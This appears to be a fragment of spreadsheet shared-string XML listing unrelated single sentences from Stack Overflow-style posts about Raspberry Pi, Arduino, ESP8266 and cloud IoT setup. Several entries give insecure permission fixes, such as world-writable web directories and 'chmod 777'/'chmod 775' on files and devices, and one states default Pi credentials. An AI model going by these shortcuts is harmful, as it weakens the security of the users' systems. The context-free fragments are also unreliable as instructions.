    <t>Another common means of accessing USB debugging options is ADB.</t>
  </si>
  <si>
    <t>You can associate data with your registered beacons as attachments.</t>
  </si>
  <si>
    <t>Sanitizer is used by the views to sanitize potentially dangerous values.</t>
  </si>
  <si>
    <t>Request a free API key at the API of your choice below.</t>
  </si>
  <si>
    <t>To read more about registering certain Padrino functionality into your Sinatra application, check out the Standalone Usage in Sinatra guide.</t>
  </si>
  <si>
    <t>They're also needed if you want to unlock your device bootloader and flash it with a new system image.</t>
  </si>
  <si>
    <t>Cross Platform
Unlike other wrappers, such as OpenCVDotNet, SharperCV or Code Project which use unsafe code, Emgu CV is written entirely in C#.</t>
  </si>
  <si>
    <t>Separately available extensions allow to read encrypted files.</t>
  </si>
  <si>
    <t>If I try to verify project I can't find it in there - I see only debug, release, new or edit.</t>
  </si>
  <si>
    <t>In Android Things, these permissions are granted automatically, but only on device boot.</t>
  </si>
  <si>
    <t>As I said above, the code is successfully verified in the Arduino SDK, so I have no idea what is going wrong.</t>
  </si>
  <si>
    <t>I'm building a project that uses an HID OEM75 as the access point for a locking mechanism.</t>
  </si>
  <si>
    <t>If you are connected as a registered device then you can't use the quickstart realtime visualization webpage for a device that is connecting with a registered client ID.</t>
  </si>
  <si>
    <t>Unlike other badges previously issued by the W3C, it does not imply validity or conformance to a certain standard.</t>
  </si>
  <si>
    <t>I found some info:
http://opensource.telkomspeedy.com/wiki/index.php/VoIP_Cookbook:_Asterisk_as_SIP_Client
, but there is only how Asterisk can be registered itself TO ANOTHER SIP server and became a client.</t>
  </si>
  <si>
    <t>Designed for building web apps from scratch without all that tiresome login / logout / admin stuff thats always required.</t>
  </si>
  <si>
    <t>and Push Service started successfully and it gave a valid Installation ID which is the same when I run the code multiple times. )</t>
  </si>
  <si>
    <t>In effect you seem to be giving Java "sudo" powers and then trusting java's security model to only give appropriate powers out to various classes.</t>
  </si>
  <si>
    <t>But still when I try to upload the code it throws this error:
avrdude: ser_open(): can't open device "/dev/ttyACM0": Permission denied
  Problem uploading to board.</t>
  </si>
  <si>
    <t>Folders showing the "hidden" files can be manually removed from the project when no longer required.</t>
  </si>
  <si>
    <t>You may find that the flash storage of the Pi is sufficiently fast that the write locks aren't a big deal.</t>
  </si>
  <si>
    <t>I am trying to connect Raspberry Pi using TLS with Client Certificate and Token to Watson IoT Platform and after following this tutorial : 
https://developer.ibm.com/recipes/tutorials/connect-raspberry-pi-to-ibm-watson-iot-platform-using-client-side-certificates/
I had this this issues  :
what can i do plaese ?</t>
  </si>
  <si>
    <t>But when I am hosting this function in Azure, it shows the following error in the portal:
Error: The binding type(s) 'eventHubTrigger' are not registered.</t>
  </si>
  <si>
    <t>In the following code I have made it so that the first time the esp8266 is powered up it tries to connect to the local wifi but since no ip and password is provided it go to access point mode and opens a sign in page.</t>
  </si>
  <si>
    <t>Log in in the shell as the user that owns the apache process and change the permission OR just do it in a simpler way: cd to /www/ directory and run the following command: 
Note that this will give writing permission to every user in your system.</t>
  </si>
  <si>
    <t>I'm writing a full body detection script with automatic img safe when body is detected via webcam (logitech c170) using a RaspberryPi3, Opencv3 and Python3.5
This is what I have so far
When executed I get the following error:
I tried replacing the all with any, didn't work.</t>
  </si>
  <si>
    <t>Developer Resources:
Eventbrite API Documentation
Authentication
API Methods
API Terms of Use
Eventbrite Open Source
API Client Libraries
Examples
Eventbrite Application Showcase</t>
  </si>
  <si>
    <t>Slight problem with import picamera it gives me a copyright error and something about multiple names and such and with ./pngview it gives it a invalid code
Do i need to download the file from https://github.com/waveform80/picamera in order for it to work?</t>
  </si>
  <si>
    <t>You should check your Microphone setting under the Chromium Content Privacy Setting and make sure you select your USB Microphone in the drop-down options.</t>
  </si>
  <si>
    <t>Step 1 - 
    Install Raspbian Jessie onto a SD card and boot the Pi when connected to a network Login via terminal or desktop and shell Configure the system with:
Expand filesystem and enable serial on advanced page, exit and reboot.</t>
  </si>
  <si>
    <t>BUILD &amp; VERIFY
Preventing bugs, rather than merely detecting them, requires fast and complete feedback across your entire delivery process.</t>
  </si>
  <si>
    <t>- From an app, the user would select one of these WiFis and provide the pass phrase
- raspberries would receive the information and connect to the WiFi
One approach would be to make the raspberries to form a WiFi network with one machine acting as access point.</t>
  </si>
  <si>
    <t>also all thumbnails below the video are shown
What doesn't:
No video as well as audio
Tried videos of all resolution, results are same = NO Video &amp; Audio
Questions:
Are there specific certificate requirements
Any audio/video library requirements
ERROR MESSAGE</t>
  </si>
  <si>
    <t>And I've tried both requireing the file as in the docs and passing the credential object directly to;
admin.credential.cert()
I only mention that I'm running on Raspberry Pi because the issue Im seeing sounds very similar to this Stack Overflow post where Firebase Admin wont write to db.</t>
  </si>
  <si>
    <t>Edit:
Here is the contents of /etc/dnsmasq.conf:
interface=wlan0
        dhcp-range=192.168.42.2,192.168.42.4,255.255.255.0,24h
dnsmasq and hostapd services are both active (running)
If I manually go and select Wifi then connect using the WPA password, the device associates then disassociates with the Pi 3, then reads AP-STA-CONNECTED with pairwise key handshake completed (RSN).</t>
  </si>
  <si>
    <t>This tutorial showed this code to convert:
This did not work so I assumed the 'csr.pem' was a mistake and changed it to 'crt' and it worked but then when trying the same for the key it gave this error: 
unable to load certificate
8384:error:0906D06C:PEM routines:PEM_read_bio:no start line:pem_lib.c:707:Expecting: TRUSTED CERTIFICATE
error in x509
Any ideas?</t>
  </si>
  <si>
    <t>As well as controls and indicators, look for other I/O: queues, notifiers, global variables, file read/writes, instrument communications, and for any data storage that persists between calls such as an uninitialised shift register.</t>
  </si>
  <si>
    <t>Besides, it might be a good idea to check your task registration in project manifest file, in the Extension section, you should see something similiar to
Mark the iot key word, probably a clue for such task only runs on Windows IoT Core.</t>
  </si>
  <si>
    <t>Retagging is underway to replace STS and associated tags with:
sts-securitytokenservice
sts-simple-templatesystem
sts-springsourcetoolsuite
This way, when a user types one of the 6 terms they are familiar/comfortable with, auto-complete will help them pick the correct one of 3 tags (instead of the current 6 plus).</t>
  </si>
  <si>
    <t>Android ships with a number of content providers for common data types (audio, video, images, personal contact information, and so on).</t>
  </si>
  <si>
    <t>Clean and simple classic interface
Report Wizard
Separate tabs for "Design", "Data" and "Code"
Security
Reports only have access to data specified by your application and data can be made read only
Encrypted templates and reports (by Rijndael-like algorithm).</t>
  </si>
  <si>
    <t>I once again took the code from the Dropbox-documentation and changed it to the following to get a traceback and to be able to execute it outside of a function:
Running this gives me the following output after entering the authorization code:
Where could I have made a mistake?</t>
  </si>
  <si>
    <t>Once set up, whether sending once-in-a-while payments or fully integrating with a specialized point of sale system, your Dwolla application will act as your identity to the end user &amp; as a central point to graphically manage your application settings.</t>
  </si>
  <si>
    <t>With the release of Delphi 3 in 1997 Borland introduced specific type of DLL, the one with enforced type safety (dependencies are codified at compile-time and checked at load time) and changed one letter: DLL -&gt; DPL - .</t>
  </si>
  <si>
    <t>Code:
Things I tried:
Checked and confirmed that server is running TLS 1.2
Installed both certificates as trusted
Creating new certificates
Using certificates through Resources file
Running web project on HTTPS
Project Setup:
ASP.NET MVC Project
.NET 4.5.2
Windows 10 Enterprise 64-bit (10.0, Build 10240)</t>
  </si>
  <si>
    <t>I'm writing code on a server to interact with an Arduino Yn shield via SSH.</t>
  </si>
  <si>
    <t>In the first place, never ever use  it's too dangerous.</t>
  </si>
  <si>
    <t>The shield blinks every 3 seconds indicating it has successfully connect to the network (Freemobile France).</t>
  </si>
  <si>
    <t>The library notes that it detected PICC compliant with ISO/IEC 14443-4 in my ePassport and finally I get its randomized UID.</t>
  </si>
  <si>
    <t>When I call , it saves your credentials.</t>
  </si>
  <si>
    <t>The setup would be to have both Arduinos have ethernet shields.</t>
  </si>
  <si>
    <t>After all steps, I've still a 'No NFC reader detected'.</t>
  </si>
  <si>
    <t>have you set the following Permissions in your Manifest file?</t>
  </si>
  <si>
    <t>Wireless uploading over BLE available.</t>
  </si>
  <si>
    <t>This option is useful in conjunction with the sshd_config(5) ChrootDirectory option.</t>
  </si>
  <si>
    <t>This tutorial shows a safe wiring diagram.</t>
  </si>
  <si>
    <t>Finally, corruption has been observed if you are overclocking the Pi.</t>
  </si>
  <si>
    <t>However, I'm not sure what permission is given to this key, unless there is an implicit permission given to all device keys?</t>
  </si>
  <si>
    <t>You can use the following command to give Apache permission to read your file sudo chmod -R 775 /dev/ttyUSB0.</t>
  </si>
  <si>
    <t>The place to do that is in whatever process you're using to register the devices.</t>
  </si>
  <si>
    <t>If you did not specify a password an auto generated one will have been given to you when you registered the device.</t>
  </si>
  <si>
    <t>Feed Validator: Checks Atom and RSS feeds.</t>
  </si>
  <si>
    <t>Here is my command:
   afplay /Users/Thomas/Downloads/cash.wav
I know its not a permissions issue because I did a chmod 777 and can run 
      file /Users/Thomas/Downloads/cash.wav
which returns:
     cash.wav: RIFF (little-endian) data, WAVE audio, MPEG Layer 3, mono 16000 Hz
FYI, if I open the file in iTunes is plays in there.</t>
  </si>
  <si>
    <t>I know that foreign keys are deactivated by default and have to be activated with PRAGMA foreign_keys = ON;.</t>
  </si>
  <si>
    <t>When I generate the code from Temboo and try to verify it in Arduino IDE I get these errors.</t>
  </si>
  <si>
    <t>Following this, I retried to use sudo both as root and as my user, both times getting the same response.</t>
  </si>
  <si>
    <t>Note: I followed a recipe to configure my Raspberry Pi , registered with the MAC address.</t>
  </si>
  <si>
    <t>I have gps shield serially connected to my raspberry pi that I will use as a car tracking device.</t>
  </si>
  <si>
    <t>On the WatsonIoT dashboard it shows registered but "Disconnected".</t>
  </si>
  <si>
    <t>The project is an personal home security thing.</t>
  </si>
  <si>
    <t>I tried visiting the webpage but then it just kept giving me this 403 error that says:
Forbidden
You don't have permission to access / on this server.</t>
  </si>
  <si>
    <t>If you understand how to write the code of certification of AWSIoT with certification, private-key and rootCA, or how to use CognitoID, Please give me a lecture.</t>
  </si>
  <si>
    <t>I've also tried starting over, repeating all steps from the tutorial and creating new certificates, etc.</t>
  </si>
  <si>
    <t>Verified files exist in ~/node-red (Raspberry Pi).</t>
  </si>
  <si>
    <t>I was thinking about another approach - communication over ethernet (using shields).</t>
  </si>
  <si>
    <t>In this post, instruction are given on how to disable firewall on the device.</t>
  </si>
  <si>
    <t>The problem probably is in LIRC not detecting your remote IR code, have you tried running irrecord with the -f option?</t>
  </si>
  <si>
    <t>Manually verify the Python program's operation that way.</t>
  </si>
  <si>
    <t>Getting the permissions right, on any directory that was written to, was one of my early problems.</t>
  </si>
  <si>
    <t>The keyboard layout between the Pi and ubuntu system were not the same and hence gave out error while giving password which was unknown to the user.</t>
  </si>
  <si>
    <t>Whatever the policy is it should have the permissions to read and write to the registry.</t>
  </si>
  <si>
    <t>This can be used in production to give unique ID to each chip.</t>
  </si>
  <si>
    <t>However, you can still remotely patch your device using State Manager.</t>
  </si>
  <si>
    <t>By default, the ESP8266 Arduino SDK saves its wifi configuration in flash memory.</t>
  </si>
  <si>
    <t>This is in fact what the "unrecognized machine ID" error is telling you -- it's from the guest kernel, and it's saying "I can't boot on this board".</t>
  </si>
  <si>
    <t>The following code will not provide any fingerprint and instead access that secure API insecurely.</t>
  </si>
  <si>
    <t>The safest place to download apps for your Mac is the Mac App Store.</t>
  </si>
  <si>
    <t>Use App Configuration to store all the settings for your application and secure their accesses in one place.</t>
  </si>
  <si>
    <t>I have a USB webcam (unknown make, no markings) thats been detected fine on my Raspberry Pi.</t>
  </si>
  <si>
    <t>I have written a small driver which is able to register my Transcend pen drive.</t>
  </si>
  <si>
    <t>avrdude: jtagmkII_close(): bad response to GO command: RSP_ILLEGAL_EMULATOR_MODE
avrdude done.</t>
  </si>
  <si>
    <t>I have successfully detected the Arduino board and displayed the vendor id and product id.</t>
  </si>
  <si>
    <t>I am playing around with the tcpdump arguments to create the perfect network spy.</t>
  </si>
  <si>
    <t>I also set the permissions of the folder/sub-folder to read write for all.</t>
  </si>
  <si>
    <t>I2C scanner is not Detecting any device on Arduino Due Board.</t>
  </si>
  <si>
    <t>Thing is I still have ssh up on my macbook pro where I'm still logged in as root.</t>
  </si>
  <si>
    <t>When I plug a USB stick/thumbdrive that has been formatted as FAT32 into a Raspberry Pi (running Raspbian) the file permissions default to 644 and I cannot change them.</t>
  </si>
  <si>
    <t>I've verified all of the register changes and they are all set correctly.</t>
  </si>
  <si>
    <t>Enable X-11 forwarding in putty, and login to raspberry pi's ip address from 2. 
try to load 'lxsession'
Is there anything I am missing?</t>
  </si>
  <si>
    <t>Therefore, the lights are working in reverse, and they flicker more when no-one is being detected, and less when there are people being detected.</t>
  </si>
  <si>
    <t>While attempting to run the example sketches with the chip I encounter a chip id error.</t>
  </si>
  <si>
    <t>The point is that it's almost sure the InnoDB system files will be corrupted/damaged after system (Debian Linux like) reboot or halt.</t>
  </si>
  <si>
    <t>From what I understand, these things are more concerned with the services exposed rather than exactly what the device is.</t>
  </si>
  <si>
    <t>Being relatively new to databases and Android, I looked up tutorials, but many of them go through a user sign-in/sign-up example.</t>
  </si>
  <si>
    <t>It will read barcoded id badges from an HID USB scanner.</t>
  </si>
  <si>
    <t>When a tag is detected, I'm storing the value and the time in a SD Card.</t>
  </si>
  <si>
    <t>I can use the aws-iot library but a bit confused about how to use AWS credentials for it (since it's not a device thing client).</t>
  </si>
  <si>
    <t>I write a simple encryption program with C for Raspberry Pi.</t>
  </si>
  <si>
    <t>My app subscribes to ibeacon messages in the foreground, but the registered iBeacons will not detected.</t>
  </si>
  <si>
    <t>It automatically connects through network however it also gives you OS within that setup procedure, you can't connect to raspberry pi without it.</t>
  </si>
  <si>
    <t>The OP mentioned "I just added the downloaded cacert.org CAs to my trusted.pem, and now git doesn't complain anymore" but I do not understand how to do this.</t>
  </si>
  <si>
    <t>This time the agent was able to communicate and registration was complete.</t>
  </si>
  <si>
    <t>I have verified that the WiFi settings are correct by using the lua code:
Is there any limitation in nodemcu while accessing private IP addresses?</t>
  </si>
  <si>
    <t>Assuming the flashed code isn't obfuscated, could I download the contents of the EEPROM?</t>
  </si>
  <si>
    <t>I'm writing a bash script, so it has to be possible to obtain the PID through code.</t>
  </si>
  <si>
    <t>Android Code:
Error:
/com.amazon.mysampleapp E/CognitoCachingCredentialsProvider: Failure to get credentials
com.amazonaws.services.cognitoidentity.model.NotAuthorizedException: Access to Identity 'us-east-1:fcbd66e0-**************' is forbidden.</t>
  </si>
  <si>
    <t>The error reads: 
My code reads:
I am not sure whats going on, as i have downloaded the same font from another website, which means it hasnt been corrupted.</t>
  </si>
  <si>
    <t>My BLE class has to scan for BLE devices which requires  privileges.</t>
  </si>
  <si>
    <t>I have created my device certificate signed by my CA (previously registered with AWS IoT), what AWS API call do I use to associate it to my device in the registry.</t>
  </si>
  <si>
    <t>On the VM the IoT Dashboard detects the PI and allows me to change
settings   
On the VM I can access the Pi's Device Portal   
On the VM I can use Powershell to log in to the Pi.</t>
  </si>
  <si>
    <t>I am trying to scan services by passing service_UUID of raspberry pi
But not able detect the device.</t>
  </si>
  <si>
    <t>For the user login I'm using cognito and I'm getting the credential after login and I already got valid credential because I connected AWS DynamoDB using the same credential.</t>
  </si>
  <si>
    <t>I'd expect a reconnection, that stores the credentials and is able to connect to the same WLAN again when the ESP32 device is powered-on at any time later.</t>
  </si>
  <si>
    <t>I can confirm using  (or other methods) that the firmware has been flashed correctly.</t>
  </si>
  <si>
    <t>I don't know how to solve this problem but I think I need to do some tricky things with certificates in the library... can somebody help?</t>
  </si>
  <si>
    <t>Meanwhile if I used this:
Ethernet IP = 192.x.x.1
Server = 192.x.x.20
I didn't face any problem interfacing my ethernet to my server.</t>
  </si>
  <si>
    <t>It's working fine but I don't understand how the node is registering at the gateway.</t>
  </si>
  <si>
    <t>AP is an access point accepting get requests from "alarm" chips.</t>
  </si>
  <si>
    <t>In the setup routine I load the credentials and try to connect to wifi.</t>
  </si>
  <si>
    <t>Because when I remove the credentials, the esp nevertheless connects successfully to the wifi.</t>
  </si>
  <si>
    <t>Basically I am working on PIR sensor, when intruder is detected it goes to 1 min of sleep time.</t>
  </si>
  <si>
    <t>Further, a tried running a sample UWP serial application here ,  which still did not detect any scanners connected over RS-232 but  was able to connect a  USB to RS-232 device.</t>
  </si>
  <si>
    <t>(I 've use hcitool dev to verify that it is truely hci0)
I type sudo hcitool hci0 lescan to scan my BLE devices (android smartphone) but my devices cannot be scanned.</t>
  </si>
  <si>
    <t>At this time the others authentications fail, and it is not possible to read the others blocks, though the access bits allow it.</t>
  </si>
  <si>
    <t>We have achieved protection of the files themselves, but there is still data being written to the partition in some form.</t>
  </si>
  <si>
    <t>I have a C++ DLL that I wrote that is failing to register on a 64-bit machine.</t>
  </si>
  <si>
    <t>How easy it for someone to steal the chip, decompile the flash, get the wifi password, clone a new ESP to do bad things?</t>
  </si>
  <si>
    <t>My question is how to handle reloading the firmware onto the chip.</t>
  </si>
  <si>
    <t>I would like to know
   If it's dangerous to create a server in my own network
   If I can make a protection if it's dangerous.</t>
  </si>
  <si>
    <t>After installation and setup of the WSO2 IoT application, I cannot enroll an android device.</t>
  </si>
  <si>
    <t>It detects a package and when the package is  taken off without verification it beeps very loudly and takes a picture of the thief.</t>
  </si>
  <si>
    <t>Therefore I wrote this program, using the SecurityProviderTpmHsm from Microsoft.Azure.Devices.Provisioning.Security to read the TPM endorsementKey.</t>
  </si>
  <si>
    <t>I'm setting up a security application to have real-time face recognition on Rasp Pi Camera.</t>
  </si>
  <si>
    <t>In the code I am giving the firebase host server with database Secrets as API key !</t>
  </si>
  <si>
    <t>The response is returned, each time after 15 sec delay
Call Networks with wrong credentials.</t>
  </si>
  <si>
    <t>I run the script as sudo, so can't be any permission issues, I tried to look into any diferences in the way I write the config and the config provided by raspbian, but no clue...</t>
  </si>
  <si>
    <t>But I could not build my app in Android Things Console because of permission denied.</t>
  </si>
  <si>
    <t>Given the device itself or its own twin, how can I obtain its public IP address?</t>
  </si>
  <si>
    <t>I double checked the wiring and the write protection, so it must be code.</t>
  </si>
  <si>
    <t>I found some Bluetooth shields that support the following protocols: BCSP, DUN, LAN, GAP SDP, RFCOMM, and L2CAP.</t>
  </si>
  <si>
    <t>Using a COM spy program, I am able to obtain the "handshaking" protocols from the terminal application.</t>
  </si>
  <si>
    <t>You could store the password in EEPROM, which you can write to with avrdude or inside your code.</t>
  </si>
  <si>
    <t>As you stated yourself, its not possible to build anything from scratch due to MS security protocols.</t>
  </si>
  <si>
    <t>If that doesn't work and you have root access you can manually change the setting in the settings.db file.</t>
  </si>
  <si>
    <t>it issues authenticate, write and read commands).</t>
  </si>
  <si>
    <t>As the detection script runs, it writes out the identifiers of any iBeacons it sees.</t>
  </si>
  <si>
    <t>If your user-facing server is compromised, an attacker can obviously reboot your server, but won't have access to your complete file system.</t>
  </si>
  <si>
    <t>You cannot alias random things to random other things.</t>
  </si>
  <si>
    <t>The checksum was to prevent bogus reads when my special pixel was not active, like during loading screens.</t>
  </si>
  <si>
    <t>Your driver has to call 
to register exclusive access to that region of memory.</t>
  </si>
  <si>
    <t>Feature detection in real-time is not very practical for you now.</t>
  </si>
  <si>
    <t>AFAIU, this is not sufficient in your case, because you are trying to debug kernel on earliest initcall levels.</t>
  </si>
  <si>
    <t>you want "to use your raspberry pi as a SIP/VOIP-Phone, just controlling the RPI via SSH"?</t>
  </si>
  <si>
    <t>If you want to use wifi capabilities, the concept it's the same, but instead of use an Ethernet shield, use a wifi shield like this.</t>
  </si>
  <si>
    <t>You could clone the Github Repository from Android Studio itself, by providing your Github credentials.</t>
  </si>
  <si>
    <t>You could change boards and select a board that has networking built in.</t>
  </si>
  <si>
    <t>The file/device has been opened for blocking reads, so the read() will not return until data is available.</t>
  </si>
  <si>
    <t>you could send data serially from first arduino to second ardiuno, individually, every time RFID is detected.</t>
  </si>
  <si>
    <t>This means using default settings, and a beacon that advertises at 10 Hz (every 0.1 s), a first detection would come anywhere from 0.1-1.1 seconds later.</t>
  </si>
  <si>
    <t>It is very likely that the device is closed source and that there are no instructions for reprogramming the firmware, so you are probably out of luck.</t>
  </si>
  <si>
    <t>firmware/ -
The firmware folder contains code that allows the computer to read and understand signals from devices.</t>
  </si>
  <si>
    <t>Below is some code sample that is verified on Raspberry Pi 2 Model B, with Windows IoT 14393, with an external USB drive connected to the USB port.</t>
  </si>
  <si>
    <t>Reflashing the firmware is enough to recover from a damaged second-stage bootloader.</t>
  </si>
  <si>
    <t>I also wrote a packet sniffer based on the data you get inside these functions (it writes out a .pcap file in flash).</t>
  </si>
  <si>
    <t>By default it was not calling the registered data function (registered via CURLOPT_READFUNCTION).</t>
  </si>
  <si>
    <t>Your problem may also be a corrupt bootloader, in which case burning the bootloader may help.</t>
  </si>
  <si>
    <t>Another way would be to define it private in settings.h and initialize it in settings.cpp.</t>
  </si>
  <si>
    <t>AWS IoT allow to associate multiple certificates to the same Thing and multiple Things to the same certificate.</t>
  </si>
  <si>
    <t>It is often used on both embedded hardware beacon transmitters as well as software beacons like the PiBeacon.</t>
  </si>
  <si>
    <t>Edited after comment
By default, the Raspberry Pi is accessible using pi / raspberry credentials.</t>
  </si>
  <si>
    <t>You can use Google Nearby to send a notification to the device on beacon detection.</t>
  </si>
  <si>
    <t>Read this about known vulnerability related to GTK, but as it mentioned in this text, hostapd is not vulnerable.</t>
  </si>
  <si>
    <t>This can be done via:
sudo chmod 777 name-of-your-file
WARNING - Don't chmod 777 on a production server, it is not secure as anyone can read/write and execute the file.</t>
  </si>
  <si>
    <t>First make sure you have permissions to write read execute  for web user.</t>
  </si>
  <si>
    <t>Make sure you enable SSH in the advanced settings of the Raspberry Pi.</t>
  </si>
  <si>
    <t>For anything more than a single state value, the state holder will want to lock access internally.</t>
  </si>
  <si>
    <t>The easiest way is to have public IP with your raspberry, but it is dangerous (see below for solution).</t>
  </si>
  <si>
    <t>The tool you've pointed to is for self-sign certificate authentication only (Individual Enrollment).</t>
  </si>
  <si>
    <t>It does two very different things:
Registration - this sets up the beacon on Google's servers and ties it to your Google account.</t>
  </si>
  <si>
    <t>to see whether your voice and data connections are registered with the network (It must be registered with the network)
If it's not connected to the network.</t>
  </si>
  <si>
    <t>It's been a while since I was in contact with embedded bluetooth-to-iphone devices, but as far as I remember you have to buy authentication chips from apple.</t>
  </si>
  <si>
    <t>The firmware is corrupted, some very broken software was flashed to it, or it's possible the board is just damaged.</t>
  </si>
  <si>
    <t>The IO API requires a custom header field, X-AIO-Key, which contains the Adafruit IO API key.</t>
  </si>
  <si>
    <t>You can connect to AWS IoT Message Broker Endpoint of any region from any geographic location as long as you have access to valid credentials.</t>
  </si>
  <si>
    <t>In MS Windows you must reboot system after disabling COM-port and then enable them again (no second reboot needed).</t>
  </si>
  <si>
    <t>The QReadWriteLock class, part of the Qt framework, provides read-write locking.</t>
  </si>
  <si>
    <t>UCanAccess is a pure Java JDBC driver that allows us to read from and write to Microsoft Access databases without using ODBC.</t>
  </si>
  <si>
    <t>(For the one-time passwords, use [tag:one-time-password])</t>
  </si>
  <si>
    <t>For questions about Android's BiometricPrompt API feature used for biometric authentication.</t>
  </si>
  <si>
    <t>To begin, you obtain OAuth 2.0 credentials from the Google Developers Console.</t>
  </si>
  <si>
    <t>If the .netrc file contains a login password, the file's permissions must be set to 600 (read and write by owner only).</t>
  </si>
  <si>
    <t>This is really handy, when you dont have the time or possibilities to write your own licensing system on your products.</t>
  </si>
  <si>
    <t>The session object has an expiration time which allows the container to invalidate the session after that specified time of the user inactivity.</t>
  </si>
  <si>
    <t>The service is free but developers have to register for an API key.</t>
  </si>
  <si>
    <t>Scheduling guarantees are offered by real-time operating systems (RTOSes), such as QNX, LynxOS or VxWorks.</t>
  </si>
  <si>
    <t>Alternatively, CUDA-based API is provided for writing CUDA code specifically in Python for ultimate control of the hardware (with thread and block identities).</t>
  </si>
  <si>
    <t>Special support for embedding into firmware or OS kernel.</t>
  </si>
  <si>
    <t>Beacons are simple devices that send one-way BLE signals.</t>
  </si>
  <si>
    <t>In order to use Google Maps APIs you need an API key or other credentials, to validate your request.</t>
  </si>
  <si>
    <t>This tokencode, which is verified by the RSA SecurID Access hosted service, is time-based and must be used before it expires.</t>
  </si>
  <si>
    <t>By using an identity provider, your users are able to sign in with familiar credentials.</t>
  </si>
  <si>
    <t>Connect with PayPal, previously known as Log In with PayPal, allows customers to sign in to your website with their PayPal login credentials.</t>
  </si>
  <si>
    <t>video-encoding which has been used to transform between videos and bytes.</t>
  </si>
  <si>
    <t>Official Android Camera documentation
To access the device camera, you must declare the CAMERA permission in your Android Manifest.</t>
  </si>
  <si>
    <t>The API provides methods to read and write from dropbox securely.</t>
  </si>
  <si>
    <t>I'm experienced in the Stack Overflow system a lot, even though I've only been registered for a short time.</t>
  </si>
  <si>
    <t>While registering a device on cloud i am getting only Node.js, Java and python SDks but i need embedded c sdk please help me to get embedded c sdk.</t>
  </si>
  <si>
    <t>I am starting to experiment with Android Things and I am trying to connect my app to a Firebase Realtime Database in a secure way.</t>
  </si>
  <si>
    <t>In the description of the known issue, it says: "Drivers must be manually copied and registered on the device.".</t>
  </si>
  <si>
    <t>However, after I followed the steps from this link, I am unable to VERIFY the certificate on the Azure Portal.</t>
  </si>
  <si>
    <t>I have successfully created ED25519 key pairs with openssl-1.1.1 on several systems (Ubuntu, Android, IOS).</t>
  </si>
  <si>
    <t>When I try to find any information online they all say that the first step is to connect the chip to a wifi.</t>
  </si>
  <si>
    <t>I was able to find guides online of how to enable it using custom firmware, however I probably won't be attempting that.</t>
  </si>
  <si>
    <t>My concern is that should someone access the device's storage and get the device id and key they would have the means to delete or overwrite files previously uploaded by that device in the storage container.</t>
  </si>
  <si>
    <t>I've been trying to understand the Fabric documentation but it's a little beyond me so I'm hoping someone can tell me how to input the password to authenticate the connection (and also authenticate any commands using ).</t>
  </si>
  <si>
    <t>For calling CreateKeyAndCertificates in eu-central-1 you need to hit iot.eu-central-1.amazonaws.com
You can try setting this endpoint using:
mIotAndroidClient.setEndpoint("iot.eu-central-1.amazonaws.com");
Thanks
Ashutosh</t>
  </si>
  <si>
    <t>AIDE (Advanced Intrusion Detection Environment) is an intrusion detection program.</t>
  </si>
  <si>
    <t>I'm seeing data corruption of the I2C traffic, I think what could be happening is that both threads are trying to write to different slave addresses at the same time.</t>
  </si>
  <si>
    <t>I tried those tutorials here:
https://www.howtoforge.com/two_in_one_dns_bind9_views
https://www.digitalocean.com/community/tutorials/how-to-configure-bind-as-a-private-network-dns-server-on-ubuntu-16-04
It still not working, if i connect on raspberry and try http://example.com:4990 i get page not found, but with ip it works as always.</t>
  </si>
  <si>
    <t>It would be a slight inconvenience to not copy the same keys across all devices, but it will save you headaches down the road if security is compromised for any reason, will keep your system from grinding to a halt while you figure out what went wrong, and is the proper thing to do.</t>
  </si>
  <si>
    <t>Full course of action -&gt;
After succesfull login you will have a jwt token
put it into a map
then use it to set in two places (not stated in any documentation!)</t>
  </si>
  <si>
    <t>Both are designed to remain within unprivileged userspace on the android device - no rooting, no kernel modifications.</t>
  </si>
  <si>
    <t>Your ISP gives you a public IP address which ir administrated by your router, so if you want this to work, you'll have to do a port forwarding from your router to your Ubuntu.</t>
  </si>
  <si>
    <t>This code prompts to go to an authorisation URL to obtain a code and upon entering the code it does go on to correctly populate a credentials file with authentication information including access_token and refresh_token.</t>
  </si>
  <si>
    <t>I installed it successfully, but when I try to register a new phonenumber java is throwing out the following error:
Haven't found any solutions anywhere on the web.</t>
  </si>
  <si>
    <t>I'm using JDBC (inside of Google Apps Script) to connect to a remote MySQL server that I created on a Raspberry Pi (running Raspbian Lite), but I'm unable to establish a connection when I run this command: 
Where "username" and "password" is the login info for my MySQL database.</t>
  </si>
  <si>
    <t>Input control follows HTML5 input types and polyfills the HTML5 validation behavior for older browsers.</t>
  </si>
  <si>
    <t>(code I run) python /home/blahblah/MyScript.py
WARNING: Please configure OAuth 2.0
To make this sample run you will need to download the client_secrets.json file and save it at:
/home/blahblah/client_secrets.json
The thing is, that file DOES exist.</t>
  </si>
  <si>
    <t>However when I run it from another computer, CGI returns the following error : 
type 'exceptions.IOError' : [Errno 13] Permission denied
I gave the file full permissions (I know it's not good, but I am the only user), I gave www-data permissions to run files.</t>
  </si>
  <si>
    <t>The following as the token exchange api return:
BTW, I tried many times, and My server never received the "action.devices.SYNC".</t>
  </si>
  <si>
    <t>I get the following error
/usr/local/sbin/ipsec: unknown IPsec command "up" ("ipsec --help" for list)
After setting up and rebooting my raspberry pi, when I run  ipsec verify, I get the table status table of ipsec verify in which my pluto is not running(error 1) and 
there is an error of ikev1.</t>
  </si>
  <si>
    <t>Please check your spelling / copying very carefully before you press 
While here, to edit the USB permissions file, you need to give the following commands in a terminal:
Become root (as above).</t>
  </si>
  <si>
    <t>Consider the following example:
I have compiled it with:
Debugging the code with gdb gives me the following information:
gdb exploit_me 
GNU gdb (GDB) 7.4.1-debian
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later &lt;http://gnu.org/licenses/gpl.html&gt;
This is free software: you are free to change and redistribute it.</t>
  </si>
  <si>
    <t>I found the following guide online which in theory works around this:
http://www.aoakley.com/articles/2016-12-29-raspberry-pi-retropie-pixel-desktop.php
Per the article, I am trying to set up a terminal command to quit the desktop environment, login again on tty1, and then run RetroPie.</t>
  </si>
  <si>
    <t>Unlike passwords which are meant to be input by users and verified by matching, secret keys are usually read from storage and are an active part of an algorithm to decrypt the protected information.</t>
  </si>
  <si>
    <t>Other key points to consider:
The other key point that is different in my setup, is the following that I didn't generated my organization registration certificate from Apple, since I was setting up on my local machine for personal use only.</t>
  </si>
  <si>
    <t>Here's a picture:
You could theoretically install an Ethernet shield directly onto the Arduino, and open it up to the public internet.. but this opens a world of security concerns you really don't want to have to try and solve.</t>
  </si>
  <si>
    <t>Maybe it would be a better practice (especially if you're runnning on an actual machine and not a container) to copy the credentials file to a new location and follow the same steps:
